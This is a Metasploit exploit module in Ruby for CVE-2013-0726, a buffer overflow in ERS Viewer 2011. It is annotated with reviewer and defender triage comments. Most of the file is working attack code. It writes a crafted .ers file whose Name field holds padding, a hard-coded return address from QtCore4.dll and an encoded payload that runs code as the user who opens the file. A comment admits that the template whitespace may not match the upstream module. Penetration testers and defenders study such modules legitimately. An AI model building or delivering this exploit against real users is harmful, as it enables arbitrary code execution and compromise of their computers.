##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

# File-format module for CVE-2013-0726 (ERS Viewer 2011, version 11.04).
#
# The module does no network I/O: it writes a crafted .ers file (FILENAME
# option, default msf.ers) that has to be opened by a user in the vulnerable
# viewer. Per the module description, the flaw is a buffer overflow in
# ERM_convert_to_correct_webpath (ermapper_u.dll), and code runs in the
# context of the user viewing the file.
#
# Triage notes for reviewers and defenders, derived from the code below:
# * The overflow data is carried in the quoted Name value of the
#   DatasetHeader block; the target offset is 260 bytes, so an .ers file
#   whose Name value is longer than that deserves inspection.
# * The value is limited to a printable-ASCII subset (see 'BadChars'), so a
#   long, high-entropy printable Name string is the expected shape.
# * The single target relies on a fixed address inside QtCore4.dll and is
#   therefore tied to the builds listed under 'Targets'.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  # Registers the module metadata (references, payload constraints, the one
  # supported target) and the FILENAME option for the generated file.
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'ERS Viewer 2011 ERS File Handling Buffer Overflow',
      # NOTE(review): written as adjacent literals so the text stays exactly
      # as it appears on the page, including leading and trailing space.
      'Description' =>
        ' This module exploits a buffer overflow vulnerability found in ERS Viewer 2011 ' \
        '(version 11.04). The vulnerability exists in the module ermapper_u.dll where the ' \
        'function ERM_convert_to_correct_webpath handles user provided data in a insecure ' \
        'way. It results in arbitrary code execution under the context of the user viewing ' \
        'a specially crafted .ers file. This module has been tested successfully with ERS ' \
        'Viewer 2011 (version 11.04) on Windows XP SP3 and Windows 7 SP1. ',
      'License'     => MSF_LICENSE,
      'Author'      =>
        [
          'Parvez Anwar', # Vulnerability Discovery
          'juan vazquez'  # Metasploit
        ],
      'References'  =>
        [
          ['CVE', '2013-0726'],
          ['OSVDB', '92694'],
          ['BID', '59379'],
          ['URL', 'http://secunia.com/advisories/51725/']
        ],
      'Payload'     =>
        {
          'Space'          => 7516,
          # Excluded bytes: double quote (0x22), backslash (0x5c), 0x7f-0xff,
          # 0x00-0x08 and 0x0a-0x1f. Tab (0x09) is the only control byte left
          # in; presumably the rest would break the quoted text field.
          'BadChars'       => "\x22\x5c" +
                              [*(0x7f..0xff), *(0x00..0x08), *(0x0a..0x1f)].pack('C*'),
          'DisableNops'    => true,
          'EncoderOptions' => { 'BufferRegister' => 'ESP' }
        },
      # ESP is listed here and as the encoder's BufferRegister; make_nops
      # below is overridden so that the filler bytes do not touch it.
      'SaveRegisters'  => ['ESP'],
      'DefaultOptions' => { 'ExitFunction' => 'process' },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'ERS Viewer 2011 (v11.04) / Windows XP SP3 / Windows 7 SP1',
            {
              'Offset' => 260,
              'Ret'    => 0x67097d7a # push esp # ret 0x08 from QtCore4.dll
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Apr 23 2013',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [true, 'The file name.', 'msf.ers'])
      ], self.class)
  end

  # Replacement for the framework's make_nops. According to the original
  # author's note, the stock implementation ignores SaveRegisters and
  # corrupts ESP, so a fixed one-byte filler is returned instead.
  #
  # @param count [Integer] number of filler bytes wanted
  # @return [String] +count+ copies of 0x43 (inc ebx)
  def make_nops(count)
    "\x43" * count # 0x43 => inc ebx
  end

  # Assembles the oversized Name value and writes the .ers file through the
  # FILEFORMAT mixin's file_create.
  def exploit
    # Layout: random text up to the target offset, the packed return address,
    # eight filler bytes, then the encoded payload. The filler keeps ESP
    # pointing at the start of the shellcode (the target's gadget ends in
    # ret 0x08).
    name_value = rand_text(target['Offset']) +
                 [target.ret].pack('V') +
                 make_nops(8) +
                 payload.encoded

    # NOTE(review): the whitespace inside this template is reproduced as it
    # appears on the page, where line breaks seem to have been collapsed;
    # verify against the upstream module before relying on the exact layout.
    ers_document = %Q| DatasetHeader Begin Name = "#{name_value}" DatasetHeader End |

    file_create(ers_document)
  end
end